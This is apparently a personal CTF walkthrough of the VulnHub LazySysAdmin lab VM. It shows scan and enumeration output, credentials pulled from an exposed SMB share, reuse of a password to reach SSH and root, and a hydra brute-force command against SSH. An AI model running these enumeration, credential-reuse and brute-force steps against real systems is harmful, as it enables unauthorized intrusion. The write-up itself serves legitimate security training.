CTF Walkthrough: LazySysAdmin

This time it’s the LazySysAdmin CTF challenge from VulnHub.

As per usual, download, spin up in VirtualBox, find the IP, and start poking!

root@kali:~/CTF/LazySysAdmin# nmap -sV -T4 10.13.37.244

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-07 15:59 EST
Nmap scan report for 10.13.37.244
Host is up (0.00018s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
MAC Address: 08:00:27:83:A1:5A (Oracle VirtualBox virtual NIC)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds

Hmmm, MySQL, Samba, SSH, Apache. Looks like we’ll be poking around for a little while.

root@kali:~/CTF/LazySysAdmin# nikto -host 10.13.37.244
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.13.37.244
+ Target Hostname:    10.13.37.244
+ Target Port:        80
+ Start Time:         2017-11-07 16:10:09 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x8ce8 0x5560ea23d23c0 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3268: /old/: Directory indexing found.
+ Entry '/old/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /test/: Directory indexing found.
+ Entry '/test/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /Backnode_files/: Directory indexing found.
+ Entry '/Backnode_files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 4 entries which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /apache/: Directory indexing found.
+ OSVDB-3092: /apache/: This might be interesting...
+ OSVDB-3092: /old/: This might be interesting...
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.22
+ Uncommon header 'x-ob_mode' found, with contents: 0
+ OSVDB-3092: /test/: This might be interesting...
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ Uncommon header 'link' found, with contents: <http://10.13.37.244/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"
+ /wordpress/: A WordPress installation was found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time:           2017-11-07 16:10:32 (GMT-5) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Let’s take a look at what this Lazy Sys Admin doesn’t want us to see…

User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/

Checked them out, nothing interesting, moving on. I see wordpress and phpmyadmin. Gonna need to find some login info for these methinks.

root@kali:~/CTF/LazySysAdmin# enum4linux 10.13.37.244
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Nov  7 16:15:59 2017

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.13.37.244
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.13.37.244    |
 ==================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================ 
|    Nbtstat Information for 10.13.37.244    |
 ============================================ 
Looking up status of 10.13.37.244
	LAZYSYSADMIN    <00> -         B <ACTIVE>  Workstation Service
	LAZYSYSADMIN    <03> -         B <ACTIVE>  Messenger Service
	LAZYSYSADMIN    <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 ===================================== 
|    Session Check on 10.13.37.244    |
 ===================================== 
[+] Server 10.13.37.244 allows sessions using username '', password ''

 =========================================== 
|    Getting domain SID for 10.13.37.244    |
 =========================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ====================================== 
|    OS information on 10.13.37.244    |
 ====================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.13.37.244 from smbclient: 
[+] Got OS info for 10.13.37.244 from srvinfo:
	LAZYSYSADMIN   Wk Sv PrQ Unx NT SNT Web server
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03

 ============================= 
|    Users on 10.13.37.244    |
 ============================= 
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ========================================= 
|    Share Enumeration on 10.13.37.244    |
 ========================================= 
WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	share$          Disk      Sumshare
	IPC$            IPC       IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	BCBSNC               LR6903242
	WORKGROUP            LAZYSYSADMIN

[+] Attempting to map shares on 10.13.37.244
//10.13.37.244/print$	Mapping: DENIED, Listing: N/A
//10.13.37.244/share$	Mapping: OK, Listing: OK
//10.13.37.244/IPC$	[E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ==================================================== 
|    Password Policy Information for 10.13.37.244    |
 ==================================================== 
[E] Unexpected error from polenum:
Traceback (most recent call last):
  File "/usr/bin/polenum", line 33, in <module>
    from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 ============================== 
|    Groups on 10.13.37.244    |
 ============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================= 
|    Users on 10.13.37.244 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\togie (Local User)
.
.
.
<trimmed because the rest is useless>

Okay, now we’re getting somewhere! I see a couple shares and a user “togie” on the system. I’m gonna see what this share gives me.

(You could mount this using cifs and the mount command, which I would usually do, but I’m lazy and just used the file browser in Kali and connected to smb://10.13.37.244)

Double clicked the “share$” share and logged in Anonymously, success! Okay, let’s dig into the wordpress directory and see if we can pull out the database admin account information.

Opening wp-config.php gives us the information we were looking for.

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

Eeeexcellent. Let’s take a look at phpMyAdmin now to see what it tells us.

Damn… click on any tables in the wordpress database and you get this error message. Looks like a problem with the permissions for the phpMyAdmin tables themselves. I’m thinking we’re going to get nowhere here.

Okay, this guy (girl? probably not, as lazy as this sys admin is, it’s probably a dude…), anyway, lazy sys admin, maybe the same password (or a slight variation) for ssh? (We know there’s a “togie” user account)

root@kali:~/CTF/LazySysAdmin# ssh togie@10.13.37.244
##################################################################################################
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         # 
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   # 
##################################################################################################

togie@10.13.37.244's password: 
Permission denied, please try again.

Nope, tried TogieMYSQL12345^^ and TogieSSH12345^^ to be sure. Neither worked. Okay, let’s look elsewhere. Let’s try WordPress.

http://10.13.37.244/wordpress/wp-admin

Username: Admin
Password: TogieMYSQL12345^^

That got us in! Poking around, the only interesting thing I see is when editing the Admin user.

Last name, email, and he likes “yogibear”. So let’s try that.

root@kali:~/CTF/LazySysAdmin# ssh togie@10.13.37.244
##################################################################################################
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         # 
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   # 
##################################################################################################

togie@10.13.37.244's password: 
Permission denied, please try again.

Nope. Okay. Let’s poke around the file share some more.

Prevent users from being able to view to web root using the local file browser

Heh, yeah, yathink?

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

Oh God, please don’t tell me…

root@kali:~/CTF/LazySysAdmin# ssh togie@10.13.37.244
##################################################################################################
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         # 
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   # 
##################################################################################################

togie@10.13.37.244's password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Wed Nov  8 10:18:12 AEST 2017

  System load:  0.0               Processes:           205
  Usage of /:   47.5% of 2.89GB   Users logged in:     1
  Memory usage: 40%               IP address for eth0: 10.13.37.244
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

133 packages can be updated.
0 updates are security updates.

New release '16.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

togie@LazySysAdmin:~$ 

Damnit… I want my time back…

Okay, hold it together, we still don’t have root. Maybe there’s more to this.

togie@LazySysAdmin:~$ sudo su -
[sudo] password for togie: 
root@LazySysAdmin:~# ls -l
total 4
-rw-r--r-- 1 root root 347 Aug 21 19:35 proof.txt
root@LazySysAdmin:~# cat proof.txt 
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851


Well done :)

Hope you learn't a few things along the way.

Regards,

Togie Mcdogie




Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
root@LazySysAdmin:~# 

SONNOVA!!! I was overthinking it. Breathe. Learn things.

Just to beat myself up further, let’s run a brute force on SSH, just to see how long that would’ve taken.

root@kali:~/CTF/LazySysAdmin# hydra -l togie -P /usr/share/wordlists/rockyou.txt ssh://10.13.37.244:22
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-11-07 19:28:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.13.37.244:22/
[22][ssh] host: 10.13.37.244   login: togie   password: 12345

Yeah, that took like 5 seconds. Maybe I shouldn’t quit my day job just yet…